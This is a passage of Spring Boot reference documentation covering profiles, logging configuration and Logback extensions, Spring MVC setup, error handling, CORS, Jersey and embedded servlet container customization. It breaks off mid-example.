unconditionally add active profiles. The `SpringApplication` entry point also has\na Java API for setting additional profiles (i.e. on top of those activated by the\n`spring.profiles.active` property): see the `setAdditionalProfiles()` method.\n\nFor example, when an application with following properties is run using the switch\n`--spring.profiles.active=prod` the `proddb` and `prodmq` profiles will also be activated:\n\n[source,yaml,indent=0]\n----\n\t---\n\tmy.property: fromyamlfile\n\t---\n\tspring.profiles: prod\n\tspring.profiles.include: proddb,prodmq\n----\n\nNOTE: Remember that the `spring.profiles` property can be defined in a YAML document\nto determine when this particular document is included in the configuration. See\n<<howto-change-configuration-depending-on-the-environment>> for more details.\n\n\n\n[[boot-features-programmatically-setting-profiles]]\n=== Programmatically setting profiles\nYou can programmatically set active profiles by calling\n`SpringApplication.setAdditionalProfiles(...)` before your application runs. It is also\npossible to activate profiles using Spring's `ConfigurableEnvironment` interface.\n\n\n\n[[boot-features-profile-specific-configuration]]\n=== Profile specific configuration files\nProfile specific variants of both `application.properties` (or `application.yml`) and\nfiles referenced via `@ConfigurationProperties` are considered as files are loaded.\nSee _<<boot-features-external-config-profile-specific-properties>>_ for details.\n\n\n\n[[boot-features-logging]]\n== Logging\nSpring Boot uses http:\/\/commons.apache.org\/logging[Commons Logging] for all internal\nlogging, but leaves the underlying log implementation open. Default configurations are\nprovided for\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/logging\/package-summary.html[Java Util Logging],\nhttp:\/\/logging.apache.org\/log4j\/[Log4J], http:\/\/logging.apache.org\/log4j\/2.x\/[Log4J2] and\nhttp:\/\/logback.qos.ch\/[Logback]. In each case loggers are pre-configured to use console\noutput with optional file output also available.\n\nBy default, If you use the '`Starter POMs`', Logback will be used for logging. Appropriate\nLogback routing is also included to ensure that dependent libraries that use\nJava Util Logging, Commons Logging, Log4J or SLF4J will all work correctly.\n\nTIP: There are a lot of logging frameworks available for Java. Don't worry if the above\nlist seems confusing. Generally you won't need to change your logging dependencies and\nthe Spring Boot defaults will work just fine.\n\n\n\n[[boot-features-logging-format]]\n=== Log format\nThe default log output from Spring Boot looks like this:\n\n[indent=0]\n----\n2014-03-05 10:57:51.112 INFO 45469 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet Engine: Apache Tomcat\/7.0.52\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.a.c.c.C.[Tomcat].[localhost].[\/] : Initializing Spring embedded WebApplicationContext\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.s.web.context.ContextLoader : Root WebApplicationContext: initialization completed in 1358 ms\n2014-03-05 10:57:51.698 INFO 45469 --- [ost-startStop-1] o.s.b.c.e.ServletRegistrationBean : Mapping servlet: 'dispatcherServlet' to [\/]\n2014-03-05 10:57:51.702 INFO 45469 --- [ost-startStop-1] o.s.b.c.embedded.FilterRegistrationBean : Mapping filter: 'hiddenHttpMethodFilter' to: [\/*]\n----\n\nThe following items are output:\n\n* Date and Time -- Millisecond precision and easily sortable.\n* Log Level -- `ERROR`, `WARN`, `INFO`, `DEBUG` or `TRACE`.\n* Process ID.\n* A `---` separator to distinguish the start of actual log messages.\n* Thread name -- Enclosed in square brackets (may be truncated for console output).\n* Logger name -- This is usually the source class name (often abbreviated).\n* The log message.\n\nNOTE: Logback does not have a `FATAL` level (it is mapped to `ERROR`)\n\n\n[[boot-features-logging-console-output]]\n=== Console output\nThe default log configuration will echo messages to the console as they are written. By\ndefault `ERROR`, `WARN` and `INFO` level messages are logged. To also log `DEBUG` level\nmessages to the console you can start your application with a `--debug` flag.\n\n[indent=0]\n----\n\t$ java -jar myapp.jar --debug\n----\n\nNOTE: you can also specify `debug=true` in your `application.properties`.\n\nIf your terminal supports ANSI, color output will be used to aid readability. You can set\n`spring.output.ansi.enabled` to a\n{dc-spring-boot}\/ansi\/AnsiOutput.Enabled.{dc-ext}[supported value] to override the auto\ndetection.\n\n\n\n[[boot-features-logging-file-output]]\n=== File output\nBy default, Spring Boot will only log to the console and will not write log files. If you\nwant to write log files in addition to the console output you need to set a\n`logging.file` or `logging.path` property (for example in your `application.properties`).\n\nThe following table shows how the `logging.*` properties can be used together:\n\n.Logging properties\n[cols=\"1,1,1,4\"]\n|===\n|`logging.file` |`logging.path` |Example |Description\n|_(none)_\n|_(none)_\n|\n|Console only logging.\n\n|Specific file\n|_(none)_\n|`my.log`\n|Writes to the specified log file. Names can be an exact location or relative to the\ncurrent directory.\n\n|_(none)_\n|Specific directory\n|`\/var\/log`\n|Writes `spring.log` to the specified directory. Names can be an exact location or\nrelative to the current directory.\n|===\n\nLog files will rotate when they reach 10 Mb and as with console output, `ERROR`, `WARN`\nand `INFO` level messages are logged by default.\n\nNOTE: The logging system is initialized early in the application lifecycle and as such\nlogging properties will not be found in property files loaded via `@PropertySource`\nannotations.\n\n\n\n[[boot-features-custom-log-levels]]\n=== Log Levels\nAll the supported logging systems can have the logger levels set in the Spring\n`Environment` (so for example in `application.properties`) using\n'`+logging.level.*=LEVEL+`' where '`LEVEL`' is one of TRACE, DEBUG, INFO, WARN, ERROR,\nFATAL, OFF. Example `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nNOTE: By default Spring Boot remaps Thymeleaf `INFO` messages so that they are logged at\n`DEBUG` level. This helps to reduce noise in the standard log output. See\n{sc-spring-boot}\/logging\/logback\/LevelRemappingAppender.{sc-ext}[`LevelRemappingAppender`]\nfor details of how you can apply remapping in your own configuration.\n\n\n\n[[boot-features-custom-log-configuration]]\n=== Custom log configuration\nThe various logging systems can be activated by including the appropriate libraries on\nthe classpath, and further customized by providing a suitable configuration file in the\nroot of the classpath, or in a location specified by the Spring `Environment` property\n`logging.config`.\n\nNOTE: Since logging is initialized *before* the `ApplicationContext` is created, it isn't\npossible to control logging from `@PropertySources` in Spring `@Configuration` files.\nSystem properties and the conventional Spring Boot external configuration files work just\nfine.)\n\nDepending on your logging system, the following files will be loaded:\n\n|===\n|Logging System |Customization\n\n|Logback\n|`logback-spring.xml`, `logback-spring.groovy`, `logback.xml` or `logback.groovy`\n\n|Log4j\n|`log4j-spring.properties`, `log4j-spring.xml`, `log4j.properties` or `log4j.xml`\n\n|Log4j2\n|`log4j2-spring.xml` or `log4j2.xml`\n\n|JDK (Java Util Logging)\n|`logging.properties`\n|===\n\nNOTE: When possible we recommend that you use the `-spring` variants for your logging\nconfiguration (for example `logback-spring.xml` rather than `logback.xml`). If you use\nstandard configuration locations, Spring cannot completely control log initialization.\n\nWARNING: There are known classloading issues with Java Util Logging that cause problems\nwhen running from an '`executable jar`'. We recommend that you avoid it if at all\npossible.\n\nTo help with the customization some other properties are transferred from the Spring\n`Environment` to System properties:\n\n|===\n|Spring Environment |System Property |Comments\n\n|`logging.exception-conversion-word`\n|`LOG_EXCEPTION_CONVERSION_WORD`\n|The conversion word that's used when logging exceptions.\n\n|`logging.file`\n|`LOG_FILE`\n|Used in default log configuration if defined.\n\n|`logging.path`\n|`LOG_PATH`\n|Used in default log configuration if defined.\n\n|`logging.pattern.console`\n|`CONSOLE_LOG_PATTERN`\n|The log pattern to use on the console (stdout). (Not supported with JDK logger.)\n\n|`logging.pattern.file`\n|`FILE_LOG_PATTERN`\n|The log pattern to use in a file (if LOG_FILE enabled). (Not supported with JDK logger.)\n\n|`logging.pattern.level`\n|`LOG_LEVEL_PATTERN`\n|The format to use to render the log level (default `%5p`). (The `logging.pattern.level` form is only supported by Logback.)\n\n|`PID`\n|`PID`\n|The current process ID (discovered if possible and when not already defined as an OS\n environment variable).\n|===\n\n\nAll the logging systems supported can consult System properties when parsing their\nconfiguration files. See the default configurations in `spring-boot.jar` for examples.\n\n[TIP]\n====\n\nYou can add MDC and other ad-hoc content to log lines by overriding\nonly the `LOG_LEVEL_PATTERN` (or `logging.pattern.level` with\nLogback). For example, if you use `logging.pattern.level=user:%X{user}\n%5p` then the default log format will contain an MDC entry for \"user\"\nif it exists, e.g.\n\n----\n2015-09-30 12:30:04.031 user:juergen INFO 22174 --- [ nio-8080-exec-0] demo.Controller Handling authenticated request\n----\n====\n\n\n\n[[boot-features-logback-extensions]]\n=== Logback extensions\nSpring Boot includes a number of extensions to Logback which can help with advanced\nconfiguration. You can use these extensions in your `logback-spring.xml` configuration\nfile.\n\nNOTE: You cannot use extensions in the standard `logback.xml` configuration file since\nit's loaded too early. You need to either use `logback-spring.xml` or define a\n`logging.config` property.\n\n\n\n==== Profile specific configuration\nThe `<springProfile>` tag allows you to optionally include or exclude sections of\nconfiguration based on the active Spring profiles. Profile sections are supported anywhere\nwithin the `<configuration>` element. Use the `name` attribute to specify which profile\naccepts the configuration. Multiple profiles can be specified using a comma-separated\nlist.\n\n[source,xml,indent=0]\n----\n\t<springProfile name=\"staging\">\n\t\t<!-- configuration to be enabled when the \"staging\" profile is active -->\n\t<\/springProfile>\n\n\t<springProfile name=\"dev, staging\">\n\t\t<!-- configuration to be enabled when the \"dev\" or \"staging\" profiles are active -->\n\t<\/springProfile>\n\n\t<springProfile name=\"!production\">\n\t\t<!-- configuration to be enabled when the \"production\" profile is not active -->\n\t<\/springProfile>\n----\n\n\n\n==== Environment properties\nThe `<springProperty>` tag allows you to surface properties from the Spring `Environment`\nfor use within Logback. This can be useful if you want to access values from your\n`application.properties` file in your logback configuration. The tag works in a similar\nway to Logback's standard `<property>` tag, but rather than specifying a direct `value`\nyou specify the `source` of the property (from the `Environment`). You can use the `scope`\nattribute if you need to store the property somewhere other than in `local` scope.\n\n[source,xml,indent=0]\n----\n\t<springProperty scope=\"context\" name=\"fluentHost\" source=\"myapp.fulentd.host\"\/>\n\t<appender name=\"FLUENT\" class=\"ch.qos.logback.more.appenders.DataFluentAppender\">\n\t\t<remoteHost>${fluentHost}<\/remoteHost>\n\t\t...\n\t<\/appender>\n----\n\nTIP: The `RelaxedPropertyResolver` is used to access `Environment` properties. If specify\nthe `source` in dashed notation (`my-property-name`) all the relaxed variations will be\ntried (`myPropertyName`, `MY_PROPERTY_NAME` etc).\n\n\n\n[[boot-features-developing-web-applications]]\n== Developing web applications\nSpring Boot is well suited for web application development. You can easily create a\nself-contained HTTP server using embedded Tomcat, Jetty, or Undertow. Most web\napplications will use the `spring-boot-starter-web` module to get up and running quickly.\n\nIf you haven't yet developed a Spring Boot web application you can follow the\n\"Hello World!\" example in the\n_<<getting-started.adoc#getting-started-first-application, Getting started>>_ section.\n\n\n\n[[boot-features-spring-mvc]]\n=== The '`Spring Web MVC framework`'\nThe Spring Web MVC framework (often referred to as simply '`Spring MVC`') is a rich\n'`model view controller`' web framework. Spring MVC lets you create special `@Controller`\nor `@RestController` beans to handle incoming HTTP requests. Methods in your controller\nare mapped to HTTP using `@RequestMapping` annotations.\n\nHere is a typical example `@RestController` to serve JSON data:\n\n[source,java,indent=0]\n----\n\t@RestController\n\t@RequestMapping(value=\"\/users\")\n\tpublic class MyRestController {\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.GET)\n\t\tpublic User getUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\/customers\", method=RequestMethod.GET)\n\t\tList<Customer> getUserCustomers(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.DELETE)\n\t\tpublic User deleteUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nSpring MVC is part of the core Spring Framework and detailed information is available in\nthe {spring-reference}#mvc[reference documentation]. There are also several guides\navailable at http:\/\/spring.io\/guides that cover Spring MVC.\n\n\n\n[[boot-features-spring-mvc-auto-configuration]]\n==== Spring MVC auto-configuration\nSpring Boot provides auto-configuration for Spring MVC that works well with most\napplications.\n\nThe auto-configuration adds the following features on top of Spring's defaults:\n\n* Inclusion of `ContentNegotiatingViewResolver` and `BeanNameViewResolver` beans.\n* Support for serving static resources, including support for WebJars (see below).\n* Automatic registration of `Converter`, `GenericConverter`, `Formatter` beans.\n* Support for `HttpMessageConverters` (see below).\n* Automatic registration of `MessageCodesResolver` (see below).\n* Static `index.html` support.\n* Custom `Favicon` support.\n* Automatic use of a `ConfigurableWebBindingInitializer` bean (see below).\n\nIf you want to take complete control of Spring MVC, you can add your own `@Configuration`\nannotated with `@EnableWebMvc`. If you want to keep Spring Boot MVC features, and\nyou just want to add additional {spring-reference}#mvc[MVC configuration] (interceptors,\nformatters, view controllers etc.) you can add your own `@Bean` of type\n`WebMvcConfigurerAdapter`, but *without* `@EnableWebMvc`.\n\n\n\n[[boot-features-spring-mvc-message-converters]]\n==== HttpMessageConverters\nSpring MVC uses the `HttpMessageConverter` interface to convert HTTP requests and\nresponses. Sensible defaults are included out of the box, for example Objects can be\nautomatically converted to JSON (using the Jackson library) or XML (using the Jackson\nXML extension if available, else using JAXB). Strings are encoded using `UTF-8` by\ndefault.\n\nIf you need to add or customize converters you can use Spring Boot's\n`HttpMessageConverters` class:\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.autoconfigure.web.HttpMessageConverters;\n\timport org.springframework.context.annotation.*;\n\timport org.springframework.http.converter.*;\n\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\tpublic HttpMessageConverters customConverters() {\n\t\t\tHttpMessageConverter<?> additional = ...\n\t\t\tHttpMessageConverter<?> another = ...\n\t\t\treturn new HttpMessageConverters(additional, another);\n\t\t}\n\n\t}\n----\n\nAny `HttpMessageConverter` bean that is present in the context will be added to the list of\nconverters. You can also override default converters that way.\n\n\n\n[[boot-features-spring-message-codes]]\n==== MessageCodesResolver\nSpring MVC has a strategy for generating error codes for rendering error messages\nfrom binding errors: `MessageCodesResolver`. Spring Boot will create one for you if\nyou set the `spring.mvc.message-codes-resolver.format` property `PREFIX_ERROR_CODE` or\n`POSTFIX_ERROR_CODE` (see the enumeration in `DefaultMessageCodesResolver.Format`).\n\n\n\n[[boot-features-spring-mvc-static-content]]\n==== Static Content\nBy default Spring Boot will serve static content from a directory called `\/static` (or\n`\/public` or `\/resources` or `\/META-INF\/resources`) in the classpath or from the root\nof the `ServletContext`. It uses the `ResourceHttpRequestHandler` from Spring MVC so you\ncan modify that behavior by adding your own `WebMvcConfigurerAdapter` and overriding the\n`addResourceHandlers` method.\n\nIn a stand-alone web application the default servlet from the container is also\nenabled, and acts as a fallback, serving content from the root of the `ServletContext` if\nSpring decides not to handle it. Most of the time this will not happen (unless you modify\nthe default MVC configuration) because Spring will always be able to handle requests\nthrough the `DispatcherServlet`.\n\nYou can customize the static resource locations using `spring.resources.staticLocations`\n(replacing the default values with a list of directory locations). If you do this the\ndefault welcome page detection will switch to your custom locations, so if there is an\n`index.html` in any of your locations on startup, it will be the home page of the\napplication.\n\nIn addition to the '`standard`' static resource locations above, a special case is made\nfor http:\/\/www.webjars.org\/[Webjars content]. Any resources with a path in `+\/webjars\/**+`\nwill be served from jar files if they are packaged in the Webjars format.\n\nTIP: Do not use the `src\/main\/webapp` directory if your application will be packaged as a\njar. Although this directory is a common standard, it will *only* work with war packaging\nand it will be silently ignored by most build tools if you generate a jar.\n\nSpring Boot also supports advanced resource handling features provided by Spring MVC,\nallowing use cases such as cache busting static resources or using version agnostic URLs\nfor Webjars.\n\nFor example, the following configuration will configure a cache busting solution\nfor all static resources, effectively adding a content hash in URLs, such as\n`<link href=\"\/css\/spring-2a2d595e6ed9a0b24f027f2b63b134d6.css\"\/>`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.resources.chain.strategy.content.enabled=true\n\tspring.resources.chain.strategy.content.paths=\/**\n----\n\nNOTE: Links to resources are rewritten at runtime in template, thanks to a\n`ResourceUrlEncodingFilter`, auto-configured for Thymeleaf and Velocity. You should\nmanually declare this filter when using JSPs. Other template engines aren't automatically\nsupported right now, but can be with custom template macros\/helpers and the use of the\n{spring-javadoc}\/web\/servlet\/resource\/ResourceUrlProvider.{dc-ext}[`ResourceUrlProvider`].\n\nWhen loading resources dynamically with, for example, a JavaScript module loader, renaming\nfiles is not an option. That's why other strategies are also supported and can be combined.\nA \"fixed\" strategy will add a static version string in the URL, without changing the file\nname:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.resources.chain.strategy.content.enabled=true\n\tspring.resources.chain.strategy.content.paths=\/**\n\tspring.resources.chain.strategy.fixed.enabled=true\n\tspring.resources.chain.strategy.fixed.paths=\/js\/lib\/\n\tspring.resources.chain.strategy.fixed.version=v12\n----\n\nWith this configuration, JavaScript modules located under `\"\/js\/lib\/\"` will use a fixed\nversioning strategy `\"\/v12\/js\/lib\/mymodule.js\"` while other resources will still use\nthe content one `<link href=\"\/css\/spring-2a2d595e6ed9a0b24f027f2b63b134d6.css\"\/>`.\n\nSee {sc-spring-boot-autoconfigure}\/web\/ResourceProperties.{sc-ext}[`ResourceProperties`]\nfor more of the supported options.\n\n[TIP]\n====\nThis feature has been thoroughly described in a dedicated\nhttps:\/\/spring.io\/blog\/2014\/07\/24\/spring-framework-4-1-handling-static-web-resources[blog post]\nand in Spring Framework's {spring-reference}\/#mvc-config-static-resources[reference documentation].\n====\n\n\n\n[[boot-features-spring-mvc-web-binding-initializer]]\n==== ConfigurableWebBindingInitializer\nSpring MVC uses a `WebBindingInitializer` to initialize a `WebDataBinder` for a particular\nrequest. If you create your own `ConfigurableWebBindingInitializer` `@Bean`, Spring Boot\nwill automatically configure Spring MVC to use it.\n\n\n\n[[boot-features-spring-mvc-template-engines]]\n==== Template engines\nAs well as REST web services, you can also use Spring MVC to serve dynamic HTML content.\nSpring MVC supports a variety of templating technologies including Velocity, FreeMarker\nand JSPs. Many other templating engines also ship their own Spring MVC integrations.\n\nSpring Boot includes auto-configuration support for the following templating engines:\n\n * http:\/\/freemarker.org\/docs\/[FreeMarker]\n * http:\/\/docs.groovy-lang.org\/docs\/next\/html\/documentation\/template-engines.html#_the_markuptemplateengine[Groovy]\n * http:\/\/www.thymeleaf.org[Thymeleaf]\n * http:\/\/velocity.apache.org[Velocity]\n * http:\/\/mustache.github.io\/[Mustache]\n\nTIP: JSPs should be avoided if possible, there are several\n<<boot-features-jsp-limitations, known limitations>> when using them with embedded\nservlet containers.\n\nWhen you're using one of these templating engines with the default configuration, your\ntemplates will be picked up automatically from `src\/main\/resources\/templates`.\n\nTIP: IntelliJ IDEA orders the classpath differently depending on how you run your\napplication. Running your application in the IDE via its main method will result in a\ndifferent ordering to when you run your application using Maven or Gradle or from its\npackaged jar. This can cause Spring Boot to fail to find the templates on the classpath.\nIf you're affected by this problem you can reorder the classpath in the IDE to place the\nmodule's classes and resources first. Alternatively, you can configure the template prefix\nto search every templates directory on the classpath: `classpath*:\/templates\/`.\n\n\n\n[[boot-features-error-handling]]\n==== Error Handling\nSpring Boot provides an `\/error` mapping by default that handles all errors in a sensible\nway, and it is registered as a '`global`' error page in the servlet container. For machine\nclients it will produce a JSON response with details of the error, the HTTP status and the\nexception message. For browser clients there is a '`whitelabel`' error view that renders\nthe same data in HTML format (to customize it just add a `View` that resolves to\n'`error`'). To replace the default behaviour completely you can implement\n`ErrorController` and register a bean definition of that type, or simply add a bean of\ntype `ErrorAttributes` to use the existing mechanism but replace the contents.\n\nTIP: The `BasicErrorController` can be used as a base class for a custom `ErrorController`.\nThis is particularly useful if you want to add a handler for a new content type (the default\nis to handle `text\/html` specifically and provide a fallback for everything else). To do that\njust extend `BasicErrorController` and add a public method with a `@RequestMapping` that\nhas a `produces` attribute, and create a bean of your new type.\n\nIf you want more specific error pages for some conditions, the embedded servlet containers\nsupport a uniform Java DSL for customizing the error handling. Assuming that you have a\nmapping for `\/400`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerCustomizer containerCustomizer(){\n\t\treturn new MyCustomizer();\n\t}\n\n\t\/\/ ...\n\n\tprivate static class MyCustomizer implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\tcontainer.addErrorPages(new ErrorPage(HttpStatus.BAD_REQUEST, \"\/400\"));\n\t\t}\n\n\t}\n----\n\nYou can also use regular Spring MVC features like\n{spring-reference}\/#mvc-exceptionhandlers[`@ExceptionHandler` methods] and\n{spring-reference}\/#mvc-ann-controller-advice[`@ControllerAdvice`]. The `ErrorController`\nwill then pick up any unhandled exceptions.\n\nN.B. if you register an `ErrorPage` with a path that will end up being handled by a\n`Filter` (e.g. as is common with some non-Spring web frameworks, like Jersey and Wicket),\nthen the `Filter` has to be explicitly registered as an `ERROR` dispatcher, e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean myFilter() {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean();\n\t\tregistration.setFilter(new MyFilter());\n\t\t...\n\t\tregistration.setDispatcherTypes(EnumSet.allOf(DispatcherType.class));\n\t\treturn registration;\n\t}\n----\n\n(the default `FilterRegistrationBean` does not include the `ERROR` dispatcher type).\n\n\n\n[[boot-features-error-handling-websphere]]\n===== Error Handling on WebSphere Application Server\nWhen deployed to a servlet container, a Spring Boot uses its error page filter to forward\na request with an error status to the appropriate error page. The request can only be\nforwarded to the correct error page if the response has not already been committed. By\ndefault, WebSphere Application Server 8.0 and later commits the response upon successful\ncompletion of a servlet's service method. You should disable this behaviour by setting\n`com.ibm.ws.webcontainer.invokeFlushAfterService` to `false`\n\n\n\n[[boot-features-spring-hateoas]]\n==== Spring HATEOAS\nIf you're developing a RESTful API that makes use of hypermedia, Spring Boot provides\nauto-configuration for Spring HATEOAS that works well with most applications. The\nauto-configuration replaces the need to use `@EnableHypermediaSupport` and registers a\nnumber of beans to ease building hypermedia-based applications including a\n`LinkDiscoverers` (for client side support) and an `ObjectMapper` configured to correctly\nmarshal responses into the desired representation. The `ObjectMapper` will be customized based on the\n`spring.jackson.*` properties or a `Jackson2ObjectMapperBuilder` bean if one exists.\n\nYou can take control of Spring HATEOAS's configuration by using\n`@EnableHypermediaSupport`. Note that this will disable the `ObjectMapper` customization\ndescribed above.\n\n\n\n[[boot-features-cors]]\n==== CORS support\n\nhttp:\/\/en.wikipedia.org\/wiki\/Cross-origin_resource_sharing[Cross-origin resource sharing]\n(CORS) is a http:\/\/www.w3.org\/TR\/cors\/[W3C specification] implemented by\nhttp:\/\/caniuse.com\/#feat=cors[most browsers] that allows you to specify in a flexible\nway what kind of cross domain requests are authorized, instead of using some less secure\nand less powerful approaches like IFRAME or JSONP.\n\nAs of version 4.2, Spring MVC {spring-reference}\/#cors[supports CORS] out of the box.\nUsing {spring-reference}\/#_controller_method_cors_configuration[controller method CORS\nconfiguration] with\n{spring-javadoc}\/org\/springframework\/web\/bind\/annotation\/CrossOrigin.html[`@CrossOrigin`]\nannotations in your Spring Boot application does not require any specific configuration.\n{spring-reference}\/#_global_cors_configuration[Global CORS configuration] can be defined\nby registering a `WebMvcConfigurer` bean with a customized `addCorsMappings(CorsRegistry)`\nmethod:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\tpublic WebMvcConfigurer corsConfigurer() {\n\t\t\treturn new WebMvcConfigurerAdapter() {\n\t\t\t\t@Override\n\t\t\t\tpublic void addCorsMappings(CorsRegistry registry) {\n\t\t\t\t\tregistry.addMapping(\"\/api\/**\");\n\t\t\t\t}\n\t\t\t};\n\t\t}\n\t}\n----\n\n\n\n[[boot-features-jersey]]\n=== JAX-RS and Jersey\nIf you prefer the JAX-RS programming model for REST endpoints you can use one of the\navailable implementations instead of Spring MVC. Jersey 1.x and Apache Celtix work quite\nwell out of the box if you just register their `Servlet` or `Filter` as a `@Bean` in your\napplication context. Jersey 2.x has some native Spring support so we also provide\nauto-configuration support for it in Spring Boot together with a starter.\n\nTo get started with Jersey 2.x just include the `spring-boot-starter-jersey` as a\ndependency and then you need one `@Bean` of type `ResourceConfig` in which you register\nall the endpoints:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class JerseyConfig extends ResourceConfig {\n\n\t\tpublic JerseyConfig() {\n\t\t\tregister(Endpoint.class);\n\t\t}\n\n\t}\n----\n\nAll the registered endpoints should be `@Components` with HTTP resource annotations\n(`@GET` etc.), e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\t@Path(\"\/hello\")\n\tpublic class Endpoint {\n\n\t\t@GET\n\t\tpublic String message() {\n\t\t\treturn \"Hello\";\n\t\t}\n\n\t}\n----\n\nSince the `Endpoint` is a Spring `@Component` its lifecycle is managed by Spring and you\ncan `@Autowired` dependencies and inject external configuration with `@Value`. The Jersey\nservlet will be registered and mapped to `\/*` by default. You can change the mapping\nby adding `@ApplicationPath` to your `ResourceConfig`.\n\nBy default Jersey will be set up as a Servlet in a `@Bean` of type\n`ServletRegistrationBean` named `jerseyServletRegistration`. You can disable or override\nthat bean by creating one of your own with the same name. You can also use a Filter\ninstead of a Servlet by setting `spring.jersey.type=filter` (in which case the `@Bean` to\nreplace or override is `jerseyFilterRegistration`). The servlet has an `@Order` which you\ncan set with `spring.jersey.filter.order`. Both the Servlet and the Filter registrations\ncan be given init parameters using `spring.jersey.init.*` to specify a map of properties.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-jersey[Jersey sample] so\nyou can see how to set things up. There is also a\n{github-code}\/spring-boot-samples\/spring-boot-sample-jersey1[Jersey 1.x sample]. Note that\nin the Jersey 1.x sample that the spring-boot maven plugin has been configured to unpack\nsome Jersey jars so they can be scanned by the JAX-RS implementation (because the sample\nasks for them to be scanned in its `Filter` registration). You may need to do the same if\nany of your JAX-RS resources are packaged as nested jars.\n\n\n\n[[boot-features-embedded-container]]\n=== Embedded servlet container support\nSpring Boot includes support for embedded Tomcat, Jetty, and Undertow servers. Most\ndevelopers will simply use the appropriate '`Starter POM`' to obtain a fully configured\ninstance. By default the embedded server will listen for HTTP requests on port `8080`.\n\n\n\n[[boot-features-embedded-container-servlets-filters-listeners]]\n==== Servlets, Filters, and listeners\nWhen using an embedded servlet container you can register Servlets, Filters and all the\nlisteners from the Servlet spec (e.g. `HttpSessionListener`) either by using Spring beans\nor by scanning for Servlet components.\n\n\n[[boot-features-embedded-container-servlets-filters-listeners-beans]]\n===== Registering Servlets, Filters, and listeners as Spring beans\nAny `Servlet`, `Filter` or Servlet `*Listener` instance that is a Spring bean will be\nregistered with the embedded container. This can be particularly convenient if you want to\nrefer to a value from your `application.properties` during configuration.\n\nBy default, if the context contains only a single Servlet it will be mapped to `\/`. In the\ncase of multiple Servlet beans the bean name will be used as a path prefix. Filters will\nmap to `+\/*+`.\n\nIf convention-based mapping is not flexible enough you can use the\n`ServletRegistrationBean`, `FilterRegistrationBean` and `ServletListenerRegistrationBean`\nclasses for complete control. You can also register items directly if your bean implements\nthe `ServletContextInitializer` interface.\n\n\n\n[[boot-features-embedded-container-servlets-filters-listeners-scanning]]\n===== Scanning for Servlets, Filters, and listeners\nWhen using an embedded container, automatic registration of `@WebServlet`, `@WebFilter`,\nand `@WebListener` annotated classes can be enabled using `@ServletComponentScan`.\n\nTIP: `@ServletComponentScan` will have no effect in a standalone container, where the\ncontainer's built-in discovery mechanisms will be used instead.\n\n\n\n[[boot-features-embedded-container-application-context]]\n==== The EmbeddedWebApplicationContext\nUnder the hood Spring Boot uses a new type of `ApplicationContext` for embedded servlet\ncontainer support. The `EmbeddedWebApplicationContext` is a special type of\n`WebApplicationContext` that bootstraps itself by searching for a single\n`EmbeddedServletContainerFactory` bean. Usually a `TomcatEmbeddedServletContainerFactory`,\n`JettyEmbeddedServletContainerFactory`, or `UndertowEmbeddedServletContainerFactory` will\nhave been auto-configured.\n\nNOTE: You usually won't need to be aware of these implementation classes. Most\napplications will be auto-configured and the appropriate `ApplicationContext` and\n`EmbeddedServletContainerFactory` will be created on your behalf.\n\n\n\n[[boot-features-customizing-embedded-containers]]\n==== Customizing embedded servlet containers\nCommon servlet container settings can be configured using Spring `Environment`\nproperties. Usually you would define the properties in your `application.properties`\nfile.\n\nCommon server settings include:\n\n* `server.port` -- The listen port for incoming HTTP requests.\n* `server.address` -- The interface address to bind to.\n* `server.session.timeout` -- A session timeout.\n\nSee the {sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`]\nclass for a complete list.\n\n\n\n[[boot-features-programmatic-embedded-container-customization]]\n===== Programmatic customization\nIf you need to configure your embdedded servlet container programmatically you can\nregister a Spring bean that implements the `EmbeddedServletContainerCustomizer` interface.\n`EmbeddedServletContainerCustomizer` provides access to the\n`ConfigurableEmbeddedServletContainer` which includes numerous customization setter\nmethods.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.context.embedded.*;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class CustomizationBean implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\tcontainer.setPort(9000);\n\t\t}\n\n\t}\n----\n\n\n\n[[boot-features-customizing-configurableembeddedservletcontainerfactory-directly]]\n===== Customizing ConfigurableEmbeddedServletContainer directly\nIf the above customization techniques are too limited, you can register the\n`TomcatEmbeddedServletContainerFactory`, `JettyEmbeddedServletContainerFactory` or\n`UndertowEmbeddedServletContainerFactory` bean yourself.\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerFactory servletContainer() {\n\t\tTomcatEmbeddedServletContainerFactory factory = new 